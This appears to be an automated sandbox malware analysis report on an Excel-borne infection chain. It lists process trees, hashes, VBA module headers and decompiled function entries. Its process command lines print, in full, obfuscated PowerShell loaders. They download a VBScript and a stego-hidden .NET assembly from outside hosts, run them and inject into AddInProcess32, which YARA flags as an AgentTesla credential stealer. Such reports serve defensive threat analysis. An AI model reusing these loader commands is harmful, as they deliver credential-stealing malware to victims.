2024-11-20 06:50:16 UTC	8192	IN	Data Raw: a8 5d c5 95 94 5f 03 76 e0 4f f2 ff 00 87 3a 10 95 24 93 ac 85 59 58 23 21 00 06 1c 8e 3d ac 8f cf 15 77 2e cc cc 6c 93 66 85 5e 05 c6 dd a4 ee 50 2d 7d fd 8e 18 6a 21 54 e0 7f 19 3b 41 20 d5 11 d7 eb 89 76 eb 91 58 0d 3c 81 82 aa 05 04 6e e9 7d 08 f8 e1 a0 96 34 68 dc 95 b0 56 e8 10 78 20 f2 3a 11 43 b7 38 87 d7 0b 02 87 99 11 88 00 b0 04 93 54 30 1d d4 4f 13 ce cc 0a 12 5c 37 01 8d ed be 0d fb fc 30 0d 2a f9 d1 48 68 81 b4 ba 8b ea 38 3f 98 17 f5 c0 48 8c 8c ca c2 98 1a 3c df c7 05 58 1a 49 3c 40 20 b5 4a 0e 4e c0 c7 aa d0 06 fb df d3 20 48 8f 13 2f 99 c2 c5 44 80 7a 97 07 8b e7 11 50 b7 c9 20 51 e9 90 7a 57 eb 80 db ca ad 1b ad d9 2c 9d 01 e4 05 20 9f ce b0 53 32 bd b2 b5 92 ec 7e 9c 56 2f 59 74 0c cc 15 41 26 fa 60 3b 29 54 12 13 20 2c d0 a2 80 a0 fb Data Ascii: ]_vO:$YX#!=w.lf^P-}j!T;A vX<n}4hVx :C8T0O\70*Hh8?H<XI<@ JN H/DzP QzW, S2~V/YtA&`;)T ,

Target ID:	0
Start time:	01:49:06
Start date:	20/11/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f740000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	01:49:57
Start date:	20/11/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe -Embedding
Imagebase:	0x13feb0000
File size:	13'824 bytes
MD5 hash:	95828D670CFD3B16EE188168E083C3C5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:50:00
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Imagebase:	0x13f2a0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:50:02
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
Imagebase:	0x13f2a0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:50:07
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2ejdq4gg\2ejdq4gg.cmdline"
Imagebase:	0x13fa70000
File size:	2'758'280 bytes
MD5 hash:	23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:50:07
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6826.tmp" "c:\Users\user\AppData\Local\Temp\2ejdq4gg\CSC8D7D0D2F906B46909F7C7CB8135B630.TMP"
Imagebase:	0x13f380000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:50:11
Start date:	20/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
Imagebase:	0xff210000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:50:11
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x13f2a0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	01:50:13
Start date:	20/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Imagebase:	0x13f2a0000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:50:16
Start date:	20/11/2024
Path:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Imagebase:	0x1250000
File size:	2'525'680 bytes
MD5 hash:	2F8D93826B8CBF9290BC57535C7A6817
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:50:31
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xc70000
File size:	42'056 bytes
MD5 hash:	EFBCDD2A3EBEA841996AEF00417AA958
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:50:32
Start date:	20/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0xc70000
File size:	42'056 bytes
MD5 hash:	EFBCDD2A3EBEA841996AEF00417AA958
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.643424873.0000000002355000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.641003530.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: mshta.exePID: 3540, Parent PID: 564COMMON

Executed Functions

Function 03490FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.478265205.0000000003490000.00000010.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 214a9aff65593042037e2f908b5e0cb84f66848594b3982744a8b070eec06d45
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Function 03490FA9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.478265205.0000000003490000.00000010.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 214a9aff65593042037e2f908b5e0cb84f66848594b3982744a8b070eec06d45
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Function 03490FB9 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.478265205.0000000003490000.00000010.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 214a9aff65593042037e2f908b5e0cb84f66848594b3982744a8b070eec06d45
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Function 03490FB1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000003.478265205.0000000003490000.00000010.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_3_3490000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 214a9aff65593042037e2f908b5e0cb84f66848594b3982744a8b070eec06d45
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 3656, Parent PID: 3540COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	50%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 000007FE899C4B18 Relevance: 1.6, APIs: 1, Instructions: 129
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE899C5B00

Memory Dump Source

Source File: 00000005.00000002.507066398.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe899c0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: f9bb48566b8a8713db188f66dd08dba335d72fc7a8ea6332beab3c7c899ed28d
Instruction ID: 0fd39b7818fca3ca73efb3d9c9ca275204db205e70f59f2811741eb3bba922f4
Opcode Fuzzy Hash: f9bb48566b8a8713db188f66dd08dba335d72fc7a8ea6332beab3c7c899ed28d
Instruction Fuzzy Hash: CB31703191CA5C8FDB58DF5C98857A9BBE1FB69715F00822ED04ED3661CB70A8458B81

Function 000007FE899C59F1 Relevance: 1.7, APIs: 1, Instructions: 159
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON ref: 000007FE899C5B00

Memory Dump Source

Source File: 00000005.00000002.507066398.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe899c0000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: 4eb14410ff6a37505ca03640c505f2fe2ae47be4f04cb48e65c452d7a4318378
Instruction ID: c70b8806b6cbf1da65165165ae70fb2f57ea280841a98dc75a3b89f6dcafc163
Opcode Fuzzy Hash: 4eb14410ff6a37505ca03640c505f2fe2ae47be4f04cb48e65c452d7a4318378
Instruction Fuzzy Hash: 7241E43191CB889FDB19DB589C447EABBF4FB66325F04826FD08DD3162CB246846C782

Function 000007FE89A926E9 Relevance: .7, Instructions: 707
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.507336099.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe89a90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c73728231a33ddd0f0dccb0ed2581c3fc9922d193f253e5f2a6d6e0b70be964
Instruction ID: 9de9e0992d15c7a93f1aff53ad45bc2ec21a4f46d2b62264a5c4d15bc7eb3c4f
Opcode Fuzzy Hash: 1c73728231a33ddd0f0dccb0ed2581c3fc9922d193f253e5f2a6d6e0b70be964
Instruction Fuzzy Hash: 9B22E53090CB894FE759EB2C8454669BFE2FF9A344F2401EED48EC72A3DA25AC55C741

Function 000007FE89A90F0D Relevance: .4, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.507336099.000007FE89A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7fe89a90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ef4f9ffc0951e15dc5f8f32d43fc56f4c4d91c17d7dede57036518e609a651
Instruction ID: 3b5cf1f82cfa8ce9859f2a12cbdce5eee42a0d49f596eecc361c5d3dc2da71f7
Opcode Fuzzy Hash: f8ef4f9ffc0951e15dc5f8f32d43fc56f4c4d91c17d7dede57036518e609a651
Instruction Fuzzy Hash: 31B1F221A0DBC90FE357973C58642657FE1EF47254B2A01EBC48ECB2B3D9199C5AC362

Analysis Process: AddInProcess32.exePID: 2228, Parent PID: 2964COMMON

Execution Graph

Execution Coverage:	12.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 002D5330 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 002D53A7

Strings

UM#, xrefs: 002D534A

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID: UM#
API String ID: 3662101638-2795023639
Opcode ID: 46e38c3e5c8120495063faf861d5f2f0a05f19d8af67c7ee60cb8f010e3dd6e2
Instruction ID: f1eee0a88864d6b64f2600653a89d2ded63d197288044ac8514b0a21d1d2bd32
Opcode Fuzzy Hash: 46e38c3e5c8120495063faf861d5f2f0a05f19d8af67c7ee60cb8f010e3dd6e2
Instruction Fuzzy Hash: 4B2128B1801219CFDB00CF9AD484BEEBBF4AF49250F14846AE455A7350D778A944CF65

Function 002DF3F8 Relevance: 3.0, Strings: 2, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

l#R, xrefs: 002DF45C
($R, xrefs: 002DF44A

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID: ($R$l#R
API String ID: 0-3934338714
Opcode ID: 0dd9f9678d7f2281b629bc6042906cba496507946e8d80687de3c0065ae73cea
Instruction ID: 1eaec8af5501865c2255e9d79888fdefb7bd9ff63eeb0c9c0b1456529a585b5b
Opcode Fuzzy Hash: 0dd9f9678d7f2281b629bc6042906cba496507946e8d80687de3c0065ae73cea
Instruction Fuzzy Hash: 0E321F31E106198FCB14EF75C89469DB7B5BFD9300F60C6AAE40AA7354EB70AD85CB40

Function 002D8DB0 Relevance: 2.8, Instructions: 2820COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_2d0000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5fc5dbda94e5c1bd91e5a65d9bfda10846a886c3d71649298d262feaa07e815
Instruction ID: 85ea1be1285b81f6f0dbb8f1960838f3a38d14b1783ead1281fc6b74e71925d9
Opcode Fuzzy Hash: a5fc5dbda94e5c1bd91e5a65d9bfda10846a886c3d71649298d262feaa07e815
Instruction Fuzzy Hash: 7153D531D10B1A8ACB51EF68C89459DF7B1FF99300F15C79AE458B7221EB70AAD4CB81

Function 002D4920 Relevance: 2.8, Strings: 2, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UM#, xrefs: 002D495F
UM#, xrefs: 002D493F

Memory Dump Source

Source File: 00000012.00000002.640446053.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: false

